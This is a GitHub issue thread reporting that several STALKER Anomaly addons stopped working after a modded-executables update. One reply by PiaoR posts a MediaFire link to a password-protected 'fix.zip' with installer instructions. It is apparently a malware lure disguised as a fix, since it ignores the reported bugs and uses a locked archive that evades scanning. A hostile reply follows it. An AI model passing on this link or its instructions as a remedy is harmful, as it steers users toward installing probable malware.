### ISSUE TITLE
Certain mods don't work in 2024.08.25 exes

### ISSUE THREAD

**Issue by maxx504** [themrdemonized/STALKER-Anomaly-modded-exes#87]
Classes and Talents addon: If you open the talents menu, you can't close it anymore.
Experience Framework addon: Unable to open the menu anymore
Toxic Air addon adds a hotkey that tells you the weather and wind direction, doesn't work.
wristwatchkey addon: the hotkey that tells you the time if you have a wrist watch on your inventory doesn't work.
As far as I played, these are the only issues that I got since updating the executables.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Drtrayblox7855** [comment]
@PiaoR Delete your life
